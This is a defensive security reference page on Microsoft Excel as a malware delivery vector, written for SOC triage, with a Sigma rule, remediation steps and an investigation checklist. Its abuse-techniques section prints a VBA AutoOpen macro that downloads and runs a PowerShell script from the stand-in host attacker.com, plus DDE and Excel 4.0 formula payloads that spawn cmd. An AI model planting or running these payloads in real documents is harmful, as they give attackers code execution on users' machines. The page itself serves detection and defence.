EXCEL.EXEOFFICE APPLICATIONEXCEL.EXE - Microsoft Excel Security Analysis
EXCEL.EXE is **Microsoft Excel**, the spreadsheet application and a **primary malware delivery vector**. Attackers abuse Excel via **malicious macros (VBA)**, **DDE attacks**, and **formula injection**. Excel spawning cmd.exe or PowerShell is a **near-certain indicator of compromise**.
Risk Summary
HIGH priority for SOC triage. EXCEL.EXE is a common malware delivery vector. Excel spawning cmd.exe, powershell.exe, or wscript.exe indicates **active compromise**. Monitor for macro execution, unusual child processes, and suspicious file opens.
Overview
What is EXCEL.EXE?
Microsoft Excel is a spreadsheet application and part of Microsoft Office.
Why It's Dangerous
Malware Vector:
- VBA macros execution
- DDE command execution
- Formula injection
- OLE embedded objects
Security Significance
- Phishing Favorite: #1 attachment type
- Macro Malware: Persistent threat
- Trusted Application: Business-critical
- Code Execution: VBA is powerful
Normal Behavior
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Program Files\Microsoft Office...\EXCEL.EXE |
| Parent | explorer.exe (user open) |
| User | Logged-in user |
| Children | None typically |
Normal Child Processes
EXCEL.EXE
├── splwow64.exe (printing)
└── (none typically)
CRITICAL: Excel should NOT spawn:
- cmd.exe
- powershell.exe
- wscript.exe
- mshta.exe
Common Locations
C:\Program Files\Microsoft Office\root\Office*\EXCEL.EXEC:\Program Files (x86)\Microsoft Office\root\Office*\EXCEL.EXESuspicious Indicators
Legitimate vs Suspicious
LEGITIMATE
Parent: explorer.exe
Children: None or splwow64.exe
Behavior: Normal spreadsheet use
SUSPICIOUS (Compromise Indicators)
Children: cmd.exe → CRITICAL
powershell.exe → CRITICAL
wscript.exe → CRITICAL
mshta.exe → CRITICAL
Behavior: Network connections on open
Downloading executables
Immediate Red Flags
| Child Process | Risk |
|---|---|
| cmd.exe | CRITICAL - Active compromise |
| powershell.exe | CRITICAL - Active compromise |
| wscript.exe | CRITICAL - Active compromise |
| rundll32.exe | HIGH - Likely malicious |
Abuse Techniques
Attack Techniques
Technique #1: Malicious Macros (T1566.001)
VBA Macro Payload:
Sub AutoOpen()
Shell "powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/ps')", vbHide
End Sub
Technique #2: DDE Attack (T1559.002)
DDE Formula:
=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!A1
Technique #3: Excel 4.0 Macros (XLM)
Legacy macro format, harder to detect:
=EXEC("cmd /c whoami")
Technique #4: Formula Injection
=cmd|' /c notepad'!A1
Detection Guidance
Detection Strategies
Priority #1: Excel Spawning Shells (CRITICAL)
Sigma Rule:
title: Excel Spawning Shell
logsource:
product: windows
category: process_creation
detection:
selection:
ParentImage|endswith: '\EXCEL.EXE'
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\wscript.exe'
- '\mshta.exe'
condition: selection
level: critical
Priority #2: Macro Execution Logging
Enable Office macro logging.
Priority #3: Network Connections
Process = "EXCEL.EXE" AND
NetworkConnection = true AND
Destination NOT IN trusted_sites
→ ALERT: HIGH
Remediation Steps
Protection and Remediation
Defense: Disable Macros
Group Policy:
Block macros in files from Internet
Disable all macros except digitally signed
Defense: ASR Rules
Enable Attack Surface Reduction:
- Block Office apps from creating child processes
- Block Office macros from making Win32 API calls
If Compromise Suspected
- Terminate Excel immediately
- Preserve the malicious document
- Identify child processes spawned
- Check for downloaded payloads
- Review macro code
- Hunt for persistence
Investigation Checklist
Investigation Checklist
- Identify the document that was opened
- Preserve document for analysis
- Check for child processes (cmd, powershell)
- Review network connections
- Extract and analyze macros
- Check for downloaded files
- Review document origin (email?)
- Hunt for persistence mechanisms